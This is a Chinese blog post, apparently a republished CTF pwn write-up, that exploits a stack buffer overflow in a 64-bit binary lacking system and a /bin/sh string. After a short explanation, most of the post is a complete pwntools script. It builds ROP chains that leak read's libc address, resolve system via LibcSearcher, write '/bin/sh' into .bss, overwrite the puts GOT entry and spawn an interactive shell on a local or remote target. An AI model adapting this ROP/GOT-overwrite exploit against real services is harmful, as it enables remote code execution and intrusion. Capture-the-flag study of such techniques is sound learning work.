发布于2019-08-07 11:53 阅读(717) 评论(0) 点赞(1) 收藏(2)
sub_40063D
函数中获取输入存放到 v1
,存在栈溢出漏洞
该程序中没用system函数,也没有binsh字符串,而且参数是经过寄存器传递的,所以要通过ROP来达成泄露 libc
,写入 /bin/sh
的操作
寄存器 rdi
中存放的是写入的地址,rsi
是写入的字节数,所以可以通过
pop rdi; ret
pop rsi; pop r15; ret
来控制写入
#coding:utf-8
from pwn import *
from LibcSearcher import *
if len(sys.argv) == 3:
io = remote(sys.argv[1],int(sys.argv[2]))
elif len(sys.argv) == 2:
io = process(sys.argv[1])
readn = 0x40063D
start = 0x40068E
read_got = 0x601028
put_plt = 0x400500
put_got = 0x601018
length = 0x40
max_length = 200
bss = 0x601040
pop_rdi = 0x0000000000400763
pop_rsi_r15 = 0x0000000000400761
def stageone():
payload = 'A'*length+"AAAAAAAA"+p64(pop_rdi)+p64(read_got) \
+p64(put_plt)+p64(pop_rdi)+p64(bss) \
+p64(pop_rsi_r15)+p64(7)+p64(0)+p64(readn)+p64(start)
payload += "A"*(max_length-len(payload))
io.send(payload)
sleep(1)
io.send("/bin/sh")
print io.recvuntil("bye~")
return u64(io.recv()[1:-1].ljust(8,'\0'))
read_addr = stageone()
print "read address: ", hex(read_addr)
libc = LibcSearcher("read",read_addr)
libc_base = read_addr - libc.dump("read")
system_addr = libc_base + libc.dump("system")
sys = p64(system_addr)
print "system address: ",hex(system_addr)
def stagetwo():
payload = 'A'*length+"AAAAAAAA"+p64(pop_rdi)+p64(put_got) \
+p64(pop_rsi_r15)+p64(len(sys))+p64(0)+p64(readn)+p64(pop_rdi)+p64(bss) \
+p64(system_addr)+p64(start)
payload += "A"*(max_length-len(payload))
io.send(payload)
print io.recv()
io.send(sys)
stagetwo()
io.interactive()
作者:妖怪还我师傅
链接:https://www.pythonheidong.com/blog/article/10507/cf460aef72d66c234be6/
来源:python黑洞网
任何形式的转载都请注明出处,如有侵权 一经发现 必将追究其法律责任
昵称:
评论内容:(最多支持255个字符)
---无人问津也好,技不如人也罢,你都要试着安静下来,去做自己该做的事,而不是让内心的烦躁、焦虑,坏掉你本来就不多的热情和定力
Copyright © 2018-2021 python黑洞网 All Rights Reserved 版权所有,并保留所有权利。 京ICP备18063182号-1
投诉与举报,广告合作请联系vgs_info@163.com或QQ3083709327
免责声明:网站文章均由用户上传,仅供读者学习交流使用,禁止用做商业用途。若文章涉及色情,反动,侵权等违法信息,请向我们举报,一经核实我们会立即删除!